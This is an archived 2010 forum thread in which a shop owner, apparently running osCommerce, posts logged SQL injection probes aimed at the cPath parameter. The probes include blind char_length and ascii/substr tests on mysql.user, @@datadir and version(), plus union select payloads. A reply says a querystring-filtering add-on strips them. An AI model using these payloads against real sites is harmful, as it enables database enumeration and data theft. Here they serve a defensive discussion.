tigergirl Posted February 3, 2010 Share Posted February 3, 2010 Wow, got a shock when I saw this in who's online: /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E88%20and%201=1 /index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3C=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E144%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(@@tmpdir)%20%20)=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(@@datadir)%20%20)%3E144%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(@@basedir)%20%20)=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(current_user())%20%20)%3E39%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(session_user())%20%20)%3C=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(user())%20%20)%3E32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(version())%20%20)=32%20and%201=1 /index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615 /index.php?cPath=31%20and%20(select%20char_length(version())%20%20)%3E144%20and%201=1 /index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1 /index.php?cPath=31%20/*!49999%20and%201=2*/-- /index.php?cPath=31%20and%201=2%20union%20select%201-- /index.php?cPath=31%20and%201=2%20union%20select%20char(97,98,97,98,97,97,97,98,98,98,97,99,97)-- /index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e/*%20and%201=1 And there were a lot more entries than that. What are they trying to do though? Security Pro is sanitizing this isn't it? Or should I be worried? IP trap is going on my priority list and I think it's the only thing I haven't implemented from the stickied security topic. I'm feeling lucky today......maybe someone will answer my post! I do try and answer a simple post when I can just to give something back. ------------------------------------------------ PM me? - I'm not for hire Link to comment Share on other sites More sharing options...
♥FWR Media Posted February 3, 2010 Share Posted February 3, 2010 Wow, got a shock when I saw this in who's online: /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E88%20and%201=1 /index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3C=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E144%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(@@tmpdir)%20%20)=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(@@datadir)%20%20)%3E144%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(@@basedir)%20%20)=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(current_user())%20%20)%3E39%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(session_user())%20%20)%3C=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(user())%20%20)%3E32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(version())%20%20)=32%20and%201=1 /index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615 /index.php?cPath=31%20and%20(select%20char_length(version())%20%20)%3E144%20and%201=1 /index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1 /index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1 /index.php?cPath=31%20/*!49999%20and%201=2*/-- /index.php?cPath=31%20and%201=2%20union%20select%201-- /index.php?cPath=31%20and%201=2%20union%20select%20char(97,98,97,98,97,97,97,98,98,98,97,99,97)-- /index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e/*%20and%201=1 And there were a lot more entries than that. What are they trying to do though? Security Pro is sanitizing this isn't it? Or should I be worried? IP trap is going on my priority list and I think it's the only thing I haven't implemented from the stickied security topic. Every one of those injection attacks uses illegal characters that would be stripped by security pro. Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls KissMT Dynamic SEO Meta & Canonical Header Tags KissER Error Handling and Debugging KissIT Image Thumbnailer Security Pro - Querystring protection against hackers ( a KISS contribution ) If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work. Link to comment Share on other sites More sharing options...
tigergirl Posted February 3, 2010 Author Share Posted February 3, 2010 Every one of those injection attacks uses illegal characters that would be stripped by security pro. ok, well I sure am glad you made such a fantastic mod and that I installed it ages ago! I haven't had a single problem with it at all..... Thanks Rob. :D I'm feeling lucky today......maybe someone will answer my post! I do try and answer a simple post when I can just to give something back. ------------------------------------------------ PM me? - I'm not for hire Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.